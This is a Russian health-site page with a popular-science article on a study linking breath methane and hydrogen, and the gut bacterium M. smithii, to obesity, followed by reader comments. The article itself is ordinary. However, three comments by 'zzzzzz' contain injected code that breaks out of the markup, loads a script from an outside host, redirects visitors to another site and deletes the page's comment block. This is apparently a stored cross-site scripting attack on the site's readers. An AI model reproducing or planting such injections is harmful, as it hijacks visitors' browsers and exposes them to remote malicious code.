Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вы не виноваты в своем ли...  >>  Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
Обратная связь
 

Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?

Размер шрифта
08 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Последнее открытие ученых из Лос-Анджелеса может несколько подсластить горькую пилюлю для людей, страдающих ожирением. Анализ дыхания на газы, выделяемые бактериями кишечника, может показать на сколько человек склонен к ожирению!

Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?

Результаты данного исследования свидетельствуют о том, что высокая концентрация водорода и метана в выдыхаемом воздухе чаще встречается у людей с избыточной массой тела.

«Наша работа является первым масштабным исследованием, в котором изучаются такого рода закономерности», – утверждает Ричи Матур, глава научной группы. «И мы убеждены, что наша деятельность позволит глубже понять причинно-следственные связи, лежащие в основе ожирения».

Участниками исследования стали 792 человека, ключевым методом был дыхательный тест. По составу выдыхаемого воздуха участники были разделены на четыре группы. В одной группе газовый состав был в норме, в другой – повышен уровень метана, в третьей – водорода, в четвертой – обоих газов. В четвертой группе процент людей с избыточным весом был намного выше.

Присутствие метана в выдыхаемом воздухе является следствием жизнедеятельности бактерии Methanobrevibacter smithii, которая обитает в нашем пищеварительном тракте.

«В норме кишечная микрофлора даже помогает нам поддерживать вес в норме, потому что превращает часть пищи в энергию. Однако в том случае, когда численность этих конкретных бактерий (M.smithii) значительно возрастает, ситуация может меняться на 180 градусов», – говорит Матур.

Чем больше этих бактерий, тем они активнее участвуют в процессе пищеварения, извлекая всё больше и больше питательных веществ из пищи. Таким образом человеку поступает больше калорий с пищей. Как итог – бедный человек толстеет.

«Это позволит нам понять, каким именно образом M. Smithii затрагивает энергетический баланс в нашем организме», – говорит Матур. «Только сейчас мы начинаем понимать истинное значение потрясающих микробов, живущих внутри нас. И мы должны выяснить в деталях, как именно они влияют на наш метаболизм. Тогда мы сможем  найти точки приложения, чтобы менять это влияние в нужном нам русле».

Пока ученные не нашли 100% метода борьбы с этими бактериями, правила питания остаются прежними! Узнайте о них все в нашем специальном проекте «Сбрось Лишнее»!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Nataliya k

21 июля 2013 в 13:41

Цитировать   |   Пожаловаться

А почему причинно-следственные связи выстроили именно в такой последовательности? Разве не может быть так, что бактерий этих в кишечнике много потому, что человек полный (склонен к перееданию, употребляет  много жирной пищи или быстрых углеводов), а не толстый потому, что их больше, нежели у стройных?

2 - zzzzzz

30 июня 2015 в 19:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как избавиться от 100 калорий в обед без усилий?   Выключите компьютер! Из-за него вы толстеете!   Даже свет во сне приводит к лишним килограммам! Как похудеть?!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом 07 июня 2013Поможет ли зеленый чай похудеть?
 

Слайдшоу

1
Почему вы не можете похудеть? 5 причин. Часть 2
Еда в новый год: продукты-обманщинки
Сладкие искусители, которые не дают вам похудеть

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.